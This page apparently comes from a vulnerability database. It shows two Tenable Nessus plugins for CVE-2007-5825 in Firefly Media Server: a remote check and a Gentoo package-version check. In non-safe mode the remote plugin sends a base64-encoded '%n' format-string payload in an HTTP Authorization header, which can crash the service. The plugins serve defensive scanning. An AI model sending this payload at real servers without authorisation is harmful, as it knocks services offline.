Vulnerabilities > CVE-2007-5825 - Use of Externally-Controlled Format String vulnerability in Firefly Media Server 0.2.4

#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(27619);
  script_version("1.21");

  script_cve_id("CVE-2007-5825");
  script_bugtraq_id(26310);

  script_name(english:"Firefly Media Server webserver.c ws_addarg Function /xml-rpc Authorization Header Remote Format String");
  script_summary(english:"Sends a specially crafted Authorization request header");

 script_set_attribute(attribute:"synopsis", value:
"The remote web server is affected by a format string vulnerability." );
 script_set_attribute(attribute:"description", value:
"The remote host is running Firefly Media Server, also known as
mt-daapd, a media streaming server. 

The version of Firefly Media Server installed on the remote host
apparently fails to sanitize user-supplied input before using it as
the format string in a call to 'vsnprintf'' in 'src/webserver.c'. 
Using a specially crafted HTTP Authorization request header, an
unauthenticated, remote attacker can leverage this issue to crash the
affected service or to execute arbitrary code on the affected system,
subject to the privileges under which the service operates." );
 script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/483209/30/0/threaded" );
  # http://sourceforge.net/project/shownotes.php?release_id=548679&group_id=98211
 script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?bd56a4e9" );
 script_set_attribute(attribute:"solution", value:
"Either disable the service or upgrade to Firefly Media Server 0.2.4.1
or later." );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");
 script_cwe_id(134);
 script_set_attribute(attribute:"plugin_publication_date", value: "2007/11/03");
 script_cvs_date("Date: 2018/11/15 20:50:22");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe",value:"cpe:/a:firefly:media_server");
script_end_attributes();


  script_category(ACT_MIXED_ATTACK);
  script_family(english:"Gain a shell remotely");

  script_copyright(english:"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl");
  script_require_ports("Services/www", 3689);

  exit(0);
}


include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

port = get_http_port(default:3689, embedded: 1);

# Make sure it looks like Firefly / mt-daapd.
banner = get_http_banner(port:port);
if (!banner || "mt-daapd/" >!< banner) exit(0);


# Try to exploit the issue.
if (safe_checks())
{
  auth2 = "Basic";
}
else
{
  if (report_paranoia < 2) exit(0);

  exploit = "%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n";
  auth2 = string("Basic ", base64(str:exploit+":"+SCRIPT_NAME));
}

url = "/xml-rpc?method=stats";
w = http_send_recv3(method:"GET", item:url, port:port,
  add_headers: make_array("Authorization", auth2));

if (isnull(w))
 res = NULL;
else
 res = strcat(w[0], w[1], '\r\n', w[2]);


# If safe checks are enabled...
if (safe_checks())
{
  # there's a problem if we see a response with an invalid argument error.
  if (!isnull(res) && "<br>Error: Invalid argument" >< res) security_hole(port);
}
# Otherwise...
else
{
  # There's a problem if the server is down.
  w = http_send_recv3(method:"GET", item:url, port:port);
  if (isnull(w)) security_hole(port);
}

#%NASL_MIN_LEVEL 80502
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Gentoo Linux Security Advisory GLSA 200712-18.
#
# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.
# and licensed under the Creative Commons - Attribution / Share Alike 
# license. See http://creativecommons.org/licenses/by-sa/3.0/
#

include("compat.inc");

if (description)
{
  script_id(29815);
  script_version("1.16");
  script_cvs_date("Date: 2019/08/02 13:32:44");

  script_cve_id("CVE-2007-5824", "CVE-2007-5825");
  script_bugtraq_id(26310);
  script_xref(name:"GLSA", value:"200712-18");

  script_name(english:"GLSA-200712-18 : Multi-Threaded DAAP Daemon: Multiple vulnerabilities");
  script_summary(english:"Checks for updated package(s) in /var/db/pkg");

  script_set_attribute(
    attribute:"synopsis", 
    value:
"The remote Gentoo host is missing one or more security-related
patches."
  );
  script_set_attribute(
    attribute:"description", 
    value:
"The remote host is affected by the vulnerability described in GLSA-200712-18
(Multi-Threaded DAAP Daemon: Multiple vulnerabilities)

    nnp discovered multiple vulnerabilities in the XML-RPC handler in the
    file webserver.c. The ws_addarg() function contains a format string
    vulnerability, as it does not properly sanitize username and password
    data from the 'Authorization: Basic' HTTP header line (CVE-2007-5825).
    The ws_decodepassword() and ws_getheaders() functions do not correctly
    handle empty Authorization header lines, or header lines without a ':'
    character, leading to NULL pointer dereferences (CVE-2007-5824).
  
Impact :

    A remote attacker could send specially crafted HTTP requests to the web
    server in the Multi-Threaded DAAP Daemon, possibly leading to the
    execution of arbitrary code with the privileges of the user running the
    web server or a Denial of Service.
  
Workaround :

    There is no known workaround at this time."
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://security.gentoo.org/glsa/200712-18"
  );
  script_set_attribute(
    attribute:"solution", 
    value:
"All Multi-Threaded DAAP Daemon users should upgrade to the latest
    version:
    # emerge --sync
    # emerge --ask --oneshot --verbose '>=media-sound/mt-daapd-0.2.4.1'"
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");
  script_cwe_id(20, 134);

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:gentoo:linux:mt-daapd");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:gentoo:linux");

  script_set_attribute(attribute:"patch_publication_date", value:"2007/12/29");
  script_set_attribute(attribute:"plugin_publication_date", value:"2007/12/31");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2007-2019 Tenable Network Security, Inc.");
  script_family(english:"Gentoo Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/Gentoo/release", "Host/Gentoo/qpkg-list");

  exit(0);
}


include("audit.inc");
include("global_settings.inc");
include("qpkg.inc");

if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/Gentoo/release")) audit(AUDIT_OS_NOT, "Gentoo");
if (!get_kb_item("Host/Gentoo/qpkg-list")) audit(AUDIT_PACKAGE_LIST_MISSING);


flag = 0;

if (qpkg_check(package:"media-sound/mt-daapd", unaffected:make_list("ge 0.2.4.1"), vulnerable:make_list("lt 0.2.4.1"))) flag++;

if (flag)
{
  if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());
  else security_hole(0);
  exit(0);
}
else
{
  tested = qpkg_tests_get();
  if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
  else audit(AUDIT_PACKAGE_NOT_INSTALLED, "Multi-Threaded DAAP Daemon");
}